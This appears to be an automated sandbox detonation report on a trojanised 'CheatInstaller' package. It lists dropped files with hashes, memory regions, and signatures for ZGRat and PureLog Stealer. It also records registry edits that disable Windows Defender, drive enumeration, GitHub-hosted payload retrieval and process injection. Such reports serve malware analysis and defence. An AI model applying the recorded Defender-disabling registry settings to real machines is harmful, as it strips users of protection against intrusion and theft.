C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\slow_log.frm

MD5 5cf177c70e9be2f41adc86ea7e0fc48b
SHA1 9a597f4d25a0fb4837fa06b9b3792de65fae9551
SHA256 9276bfd579b31e71a0f85e8b1085e6f00aafc1428b3c5dee2e765e80c34260a3
SHA512 054f52c54dd936a87ad49f1b31fbf248962ad6909686a98e3b76c6772f7ffbb09e6ecb336c3ff6499eadd45746e407c90992fe5e93f44d0e7feee4cab1e071a1

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\help_relation.MYI

MD5 b7d1f26327bf857bf6ce98ea4fda22b1
SHA1 b3f9c0dd62d5a7f533be36664f8e4954cd1f216d
SHA256 7ce3f6771b4c0a0c0e662dc51ecb460aae223bb3292eaea6c1c6f1bb805b3786
SHA512 91e83b2a3aa885e240f2634d15662954aa0d1104b85ae7bf33948b6bcffcbf763baddb3ecdabd15de53d6eda23d765716891b4dbaaf70168b837480f055e5ab2

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\db.MYI

MD5 f0bb4307afbd586f0499f4023213863d
SHA1 cd978f445f02aab75b1d89c5e28e348860d8c306
SHA256 49a2cd5ce74b5969db3eb785c02fda21f207672b2348c95252b3200d05281129
SHA512 a4327e9535d84ad98b4880764a05141170febf1c02d3fb74f71d704185e8176545c15ecfa34e5c8218cc33f4b7f07deb1fe0f2c06c1b400a3798a75016de861c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_samplernn.wav

MD5 5acab132e4baf883d7f785fabf624952
SHA1 dcd1e3fe209cea31e72531e1484b6bb156347308
SHA256 e14563629a67f07764f12cfae343d8ddb0309cbda241391d095fbb6109302dd1
SHA512 714ed7d425424006fbf248c2e5b95e6525f4abc6e563ecf544fe52f12881af7cf8bd73e790657766e545e753c23f1bd363dde8b6faba675bca147a22cc802c3c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_tatum.wav

MD5 be2e3041c72229ec79e9423603b942b2
SHA1 af6f0bce06505f0a623e04a1e65965e124517dd6
SHA256 5650a79a07f02fe153414827ea345edfdd52fd086b61435b030f2b21d86f057e
SHA512 d6ade3a99d8132db77fe99869a4e9052d17df17a8b96280b77a8a5f908cbf265073d24f5314d2862d8c3d7f1eae9da8c34d2dc38aac6adfac24945e9b1472ce4

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_birds.wav

MD5 f36b5ff8446f487897df4dfc256f817d
SHA1 d7e152ae0370860d4d6f8b86284762a5f2fc416d
SHA256 ab60c5e17efa6938470e9518df24301934252891162a486546798b45ba3bc8a0
SHA512 ee727c238d25db53c53a4b19bb22996f2ea4c7abd54de6a728a8892c0ed69753a38ea9410fb8789687fa3799ce2d718fe7ba9ac90dc26b2a48be950074bcd39e

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_drums.wav

MD5 0e6bcca437f8db26c23aad3020e333ea
SHA1 9feb3ff5d33ecb53404920b4183223d8eb724e73
SHA256 5e57136d97bfc46f48d673a682af6729e209dd70b402f83b34e118cfa18c2763
SHA512 b317f3d0628c0a4644127911a0cf6dc001f449d2aff23f8c7ba418aa742f9e02f15a3de926798d97bab99fe80ed2872152c770a39467e29b1db94acd598344aa

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_birds.wav

MD5 6f4f55c3d6689bbba6170152425c0af1
SHA1 ff8843cf6f1bd2cbb5e0d47148f438187f4cd4c6
SHA256 723a152111c99627121df838cdd483587cb597835961b05c5ce22f135ad2f28f
SHA512 6ec4bc8a3299ad3bd033d3d72c5d5ccad3eea773d11fc603a6cf477304f223ce7cd2d568da092cc69d91bbab85aa3b609b03d7ff66e3d1791a2a4cd2d97e8323

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_timit.wav

MD5 194bb78e07935f96df77e7c83a0a6cb4
SHA1 d445db61c505dad661a0652a5b81e5c676feb612
SHA256 767e225832e7af1c8bac29ff889ece6834e5064f880dbd431bd531c33e635658
SHA512 0ca46372975ec67c8725b9421c919a24b4310c088584332bf48198a3c8f336b3273716a99fdfd10791f0ba06a0a843b4f5e32384decc4ed8abc8ba67bdc00f97

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_parametric.wav

MD5 37c5ed6c4b4c4f6ef76e0bbfa6780b9a
SHA1 d25a798bb75b194936092cbd7a1d308bf6cf01e4
SHA256 9c62a3a77a1e1b781765d6a9c1c8cfe1a9805cea0038a92b013fd6d996fe379f
SHA512 d78f095f25fc459b456449693ebb8a25ea42e92383423b6deaaf9156499ab9f7ed9d2088e40bdfb947b7e0579f5240ca27fdb8e462e82d87a6e06c357ee40d2d

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_piano.wav

MD5 2ac4632046ec129b1619d6e982c6bee9
SHA1 bcf55c943a467ff5fe309ca25e856fd534b7b081
SHA256 b1802ae3e05db654968e07cc7771e269ef45a52b830d4dbb617c149bbc9810ab
SHA512 a1b24ff9dc21413509614fd9581bc999aa6448b7b9bcadf55b473597c3a063039e0a2b600d690208cff416e113f6e8318866463156f2c226567bc21929e799a6

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\help_topic.frm

MD5 ccaca741f4002cb8af48d485501ec8e9
SHA1 4895716a9baf869a5ba2ec1c2d0523b7bc8a6cb3
SHA256 0e2099aa021c0a2819f8f80960d729e66f69754675bfe847af8923029a330ec1
SHA512 09f005f1e7e8f9f388031c673a593c8afac42298b6f97ff708babfbc403a952692a0bbfbab3ebbd89f8506c2ec7bdb4154f70827680b6dfd390f80054ff2910a

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\general_log.frm

MD5 ea26bb989e3e2c321a47d499d2682ae1
SHA1 a79e8c99186c20fb09f1457b3d183538e1e1b1bb
SHA256 4a208c39ac55c440fa336c3463428609db81112512f6551a1331a516a2d1da81
SHA512 07f2b43db67b76b463c1770dd6ddb445bbcefcd8f8dfb85e9c28306cf5282272805516dd3166851b66a8358e16632a09a524d6918aae8711d97939beda53137e

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps4.wav

MD5 cc441e5812530ddb52d63bfe33152521
SHA1 78b197f5367ed251b1f1bb55bef8fdc64210c7d1
SHA256 73af11ff7ade286f21495eedcdbf536bc77289dea238d95243c5c930fe3be14e
SHA512 4f89beba3ffa2f36c24f7c786e26c8e6254041062f897122d7d3d05972a79fd28be82fbc4b273adf036b8bc4e6aad1dcbf08664a017d318cc79da85e31f570b6

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_specgan.wav

MD5 8255f67bfc3ecdc295769095a978febf
SHA1 29a86937fff81366d2f351e83013ec2085888daf
SHA256 82bc4777da977bd63738158e8f62b5360eb817dabee32e8fad12c7abadf54cdd
SHA512 5a4be89a24a8707ae06e0cb07fac2badb2b67f4b81e31716aea0cd9ee32901bb75c47ea7a58f0729cd29b84c94de9c02c802f776fb9c308cb2e36b12e45537ea

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavenet_r9y9.wav

MD5 c5f2abb4c90679145ee886d7f2a2df19
SHA1 dc83ac69b8fe03a1a485e620a88001ff98c34bd4
SHA256 875c89eee298d0d69e6757942212695c46d3f1e68170bfb52f2e2ba00d0d71cb
SHA512 4ccd6d5b7ed7e7364f793a13ffc96cb9425a7913142150b398befec5411e6fb33102960b887ff219e34ec051da0b06a8fc189533c01d52de4deba10304cb4435

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps2.wav

MD5 3699a680fb92582c06932c059886e8a5
SHA1 a5b6dc92b96ac00a618175c7cbef055c7dbcd2c4
SHA256 5af2f1f36d853007dbe6d62a9b9da9735ba1cf3d5116ca48a401655fb8f3b6cf
SHA512 a067a77a24ffdd978fa26673d3e1124eee7f7d54e1cb59022442fb517558be6b160c7748c8d807be6911006738b7f741e2759fa488966c36a6272ea5f226fcc5

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_birds.wav

MD5 95571baa50574628aadb70525035efd6
SHA1 53dff1840592588b9c52f472ae58fa249bc298e0
SHA256 fb9232347afc7b2f56558801907b43c9c04a6efba3c5d3b02b1dc9ea1b2c1c83
SHA512 16d0418192d56f3d35b75fd7b92119cdfda36ec27e728bdacc28d09c6ccbbf3f2ec02760415476824350f5c217e6df1ff3d2551d629101a41ce3643734f63ff8

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_drums.wav

MD5 040963f93a43be7b6050f002fd981578
SHA1 3c8df5a5c96e449a966d32af6c5835d6de74bb68
SHA256 9ec8c24a8bddea004d078f9d1047c7a94fbd5d79c0ab88e84a8cef5d12e0d823
SHA512 e14315902550192067ef3fcf95be951bda585306fcc0e54e3c14aad26aed3589147dfc88a4932ffce14dbc54ce58b45496da71eb347bef2dae97e981775e51d5

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_piano.wav

MD5 13a5675639801f07b9b84df65e987bf4
SHA1 dfe7f16f3ad5ad012e0560db6294186e47f5a61d
SHA256 9ac4f4be2870852ed62d8b13cad5ac3a5245ba8956fdf9a0f634778a405c93f1
SHA512 72cd54bf8ffb17c1d1909e3488206248742de63b6e6bdcf2549e0543b7a5e95902dc841cd38c2d02ccba1e6c3cb1fa32bdc1de1f87930da0c6522d5d82b9936e

C:\Windows\Installer\MSI8151.tmp

MD5 cac17c92ed0d30bc68ce60905e0af1ea
SHA1 29589b5816214f537ffb03a4ff9c79f1bd25908b
SHA256 e5a59959b68626f622c7a27b2a42468dbfe03a6d956b58b2cdccedf0a632d161
SHA512 041aab2032745c2f800ac05ee77073167bf37f81dee56774b498c8f1b60fdcc8f16904e909ed42ef9157dfebeada9998d5c155aa1a10df1ccd608177425acc20

C:\Windows\Installer\MSI8309.tmp

MD5 165f730f078c7019ea5f2642f8208cda
SHA1 370f2e4d1f298b62c1d4743d0e23d2a2d41f950d
SHA256 48f509d74ca1afa44b3053e5fb0ddc15d56ca8844e9d150419891c5a38a071a6
SHA512 36868c499b28f96853fb77a1dacef2ad2a06ee7b1be41ff2782ac0f90dd247f522dc64951fa72bb77a85d930ddffe28b06eb391e5bf803e396adaa7211c183b6

memory/4332-3916-0x0000000070AD0000-0x00000000711BE000-memory.dmp

memory/4332-3919-0x0000000003250000-0x0000000003286000-memory.dmp

memory/4332-3918-0x0000000007330000-0x0000000007340000-memory.dmp

memory/4332-3921-0x0000000007970000-0x0000000007F98000-memory.dmp

memory/540-3925-0x00007FFD39B80000-0x00007FFD3A56C000-memory.dmp

memory/540-3926-0x00000240D2DF0000-0x00000240D2E00000-memory.dmp

memory/4332-3927-0x0000000007440000-0x0000000007462000-memory.dmp

memory/4332-3928-0x00000000075A0000-0x0000000007606000-memory.dmp

memory/4332-3929-0x0000000007860000-0x00000000078C6000-memory.dmp

memory/4332-3944-0x0000000007FA0000-0x00000000082F0000-memory.dmp

memory/540-3945-0x00000240D2DF0000-0x00000240D2E00000-memory.dmp

memory/4332-3966-0x00000000077F0000-0x000000000780C000-memory.dmp

memory/4332-3967-0x00000000084E0000-0x000000000852B000-memory.dmp

memory/4332-3970-0x0000000008610000-0x0000000008686000-memory.dmp

memory/540-3971-0x00000240D2DF0000-0x00000240D2E00000-memory.dmp

memory/540-3974-0x00007FFD39B80000-0x00007FFD3A56C000-memory.dmp

memory/1752-3986-0x00007FFD39B80000-0x00007FFD3A56C000-memory.dmp

memory/1752-3988-0x000002946AAA0000-0x000002946AAB0000-memory.dmp

memory/1752-3989-0x000002946AAA0000-0x000002946AAB0000-memory.dmp

memory/4332-4008-0x0000000070AD0000-0x00000000711BE000-memory.dmp

memory/1752-4009-0x000002946AAA0000-0x000002946AAB0000-memory.dmp

memory/1752-4033-0x000002946AAA0000-0x000002946AAB0000-memory.dmp

memory/4332-4032-0x0000000007330000-0x0000000007340000-memory.dmp

memory/1752-4038-0x00007FFD39B80000-0x00007FFD3A56C000-memory.dmp

memory/32-4044-0x00007FFD39B80000-0x00007FFD3A56C000-memory.dmp

memory/4332-4043-0x0000000009420000-0x000000000943A000-memory.dmp

memory/4332-4041-0x0000000009AD0000-0x000000000A148000-memory.dmp

memory/32-4046-0x0000029F15D20000-0x0000029F15D30000-memory.dmp

memory/32-4047-0x0000029F15D20000-0x0000029F15D30000-memory.dmp

memory/4332-4052-0x0000000009730000-0x00000000097C4000-memory.dmp

memory/4332-4054-0x00000000094C0000-0x00000000094E2000-memory.dmp

memory/4332-4056-0x000000000A650000-0x000000000AB4E000-memory.dmp

memory/32-4071-0x0000029F15D20000-0x0000029F15D30000-memory.dmp

memory/4332-4094-0x00000000099D0000-0x0000000009A62000-memory.dmp

memory/4332-4095-0x0000000007330000-0x0000000007340000-memory.dmp

memory/4332-4098-0x0000000009A70000-0x0000000009A7A000-memory.dmp

memory/4332-4100-0x0000000007330000-0x0000000007340000-memory.dmp

memory/32-4104-0x0000029F15D20000-0x0000029F15D30000-memory.dmp

memory/32-4107-0x00007FFD39B80000-0x00007FFD3A56C000-memory.dmp

memory/1080-4111-0x00007FFD39B80000-0x00007FFD3A56C000-memory.dmp

memory/1080-4112-0x0000024A94940000-0x0000024A94950000-memory.dmp

memory/1080-4114-0x0000024A94940000-0x0000024A94950000-memory.dmp

memory/1080-4129-0x0000024A94940000-0x0000024A94950000-memory.dmp

memory/1080-4156-0x0000024A94940000-0x0000024A94950000-memory.dmp

memory/1080-4159-0x00007FFD39B80000-0x00007FFD3A56C000-memory.dmp

memory/5096-4163-0x00007FFD39B80000-0x00007FFD3A56C000-memory.dmp

memory/5096-4165-0x0000022C908F0000-0x0000022C90900000-memory.dmp

memory/5096-4166-0x0000022C908F0000-0x0000022C90900000-memory.dmp

memory/5096-4182-0x0000022C908F0000-0x0000022C90900000-memory.dmp

memory/4332-4181-0x0000000007330000-0x0000000007340000-memory.dmp

memory/4332-4205-0x0000000007330000-0x0000000007340000-memory.dmp

memory/5096-4206-0x0000022C908F0000-0x0000022C90900000-memory.dmp

memory/5096-4209-0x00007FFD39B80000-0x00007FFD3A56C000-memory.dmp

memory/3728-4218-0x00007FFD39B80000-0x00007FFD3A56C000-memory.dmp

memory/3728-4219-0x00000209CD2C0000-0x00000209CD2D0000-memory.dmp

memory/3728-4220-0x00000209CD2C0000-0x00000209CD2D0000-memory.dmp

C:\Windows\Installer\MSI24F.tmp

MD5 4a063ecbc6e21f4a145066f6234812bb
SHA1 6f9bcdbd2312a58dbfa3a92a63405cb09a57e040
SHA256 311a847a6612c8a163c43b456a05a205d0275a369e2749b7e5a7de6a64c2b492
SHA512 928ef30b1c4a1b86cc1202c1fdffe0ff9fb0abad00b9b3f88bf7ea84c940df915aea285de31a03d9e96a4e88b4fe5768b0574a22b314abaa52ccca3f0ab3445d

C:\Windows\Installer\MSI251.tmp

MD5 03e02fa0fcbfc84933678cd88582d804
SHA1 c91b0e6ca8172a29b101df7532655a130784724c
SHA256 7ca5c0e1dc745ab24ef4a1bd0990880a118e548bc7492d65b2b719e21cfdae35
SHA512 984c397976547003ceca5057a5371aa5917965701f95995d6653e7822cbe2c16b9f8fa4067cbf433b689d123bd0a8bd3373e32e704d377a751e2645318d74ece

C:\Windows\Installer\MSI2DF.tmp

MD5 18db7a45912d1664716efdf6e311f5f1
SHA1 24a5d1d2addf8095e6f5e4040a2e1c44956bb141
SHA256 5ffa59b2cb0995af80de9ce944bb3e2933c42cea0d764c0af137ff842dc7fd0c
SHA512 5bc3db53b113d9098170eac6ac1fd2327e6e02f6e5e5e6a5c48e861e1ff683fd2a88928638a0f046a8b89488d6ce1f9eba9952aa34b5ab0858f671b890f250ff

C:\Config.Msi\e58466d.rbs

MD5 f8956fac1060d0cbc26c41e99b5a6eb9
SHA1 3213ae83af317b0b5b30bc5f259e316cbc4f08bb
SHA256 eebcc0414d9ac5aaec4c49be85de516a2472672effb1be883dcdadb4521473d6
SHA512 91df0963ad52780b5c9f20aeaf6d6d77c6ad50dcb1554bdf1cc8534cc94dd299f8be0071ed4debd5b103498b966379a266e8e5a76319619b8976102c0489fb74

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\mock-globals\.gitignore

MD5 8da13f306c8c0f4f4a32960e93725b42
SHA1 b9ee3f4a8b64284a8f698206993e4ec2cf83f66f
SHA256 ca7a3d5544beb40beb598f6ae22527e8cbcbc29b67f241ad9e572a50a89848b0
SHA512 59e6493139d8a3af2889fb337032f41124a53f5ca7ee06906c97d4f6cf0fa942f28b3b7ce2d449b10ea0a01a39282397984ea46df43571d2a5fe753fc20bb6cc

memory/2896-4335-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp

memory/2896-4337-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp

memory/2896-4343-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp

memory/3016-4348-0x00000000051E0000-0x0000000005450000-memory.dmp

memory/3044-4347-0x0000000004F80000-0x00000000051FF000-memory.dmp

memory/3016-4345-0x00000000051E0000-0x0000000005450000-memory.dmp

memory/3044-4349-0x0000000004F80000-0x00000000051FF000-memory.dmp

memory/2896-4351-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp

memory/3016-4354-0x00000000051E0000-0x0000000005450000-memory.dmp

memory/3044-4355-0x0000000004F80000-0x00000000051FF000-memory.dmp

memory/3044-4362-0x0000000004F80000-0x00000000051FF000-memory.dmp

memory/3016-4361-0x00000000051E0000-0x0000000005450000-memory.dmp

memory/3016-4368-0x00000000051E0000-0x0000000005450000-memory.dmp

memory/3044-4370-0x0000000004F80000-0x00000000051FF000-memory.dmp

memory/3044-4377-0x0000000004F80000-0x00000000051FF000-memory.dmp

memory/3016-4375-0x00000000051E0000-0x0000000005450000-memory.dmp

memory/2896-4364-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp

memory/3044-4383-0x0000000004F80000-0x00000000051FF000-memory.dmp

memory/3016-4382-0x00000000051E0000-0x0000000005450000-memory.dmp

memory/3044-4389-0x0000000004F80000-0x00000000051FF000-memory.dmp

memory/3016-4387-0x00000000051E0000-0x0000000005450000-memory.dmp

memory/3044-4395-0x0000000004F80000-0x00000000051FF000-memory.dmp

memory/3016-4394-0x00000000051E0000-0x0000000005450000-memory.dmp

memory/2896-4393-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp

memory/2896-4378-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp

memory/3016-4403-0x00000000051E0000-0x0000000005450000-memory.dmp

memory/3044-4402-0x0000000004F80000-0x00000000051FF000-memory.dmp

memory/2896-4405-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp

memory/3016-4409-0x00000000051E0000-0x0000000005450000-memory.dmp

memory/3044-4411-0x0000000004F80000-0x00000000051FF000-memory.dmp

memory/3044-4407-0x0000000004F80000-0x00000000051FF000-memory.dmp

memory/3044-4416-0x0000000004F80000-0x00000000051FF000-memory.dmp

memory/2896-4414-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp

memory/3016-4415-0x00000000051E0000-0x0000000005450000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-03-18 19:24

Reported

2024-03-18 20:25

Platform

win10v2004-20240226-en

Max time kernel

118s

Max time network

116s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RUN.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

PureLog Stealer

stealer purelogstealer

PureLog Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A

ZGRat

rat zgrat

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Windows\Installer\MSID778.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Windows\Installer\MSIE807.tmp N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\syswow64\MsiExec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3432 set thread context of 9024 N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_samplernn.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\lang_ita.txt C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\slow_log.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\db.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_sc09.wav C:\Windows\system32\msiexec.exe N/A
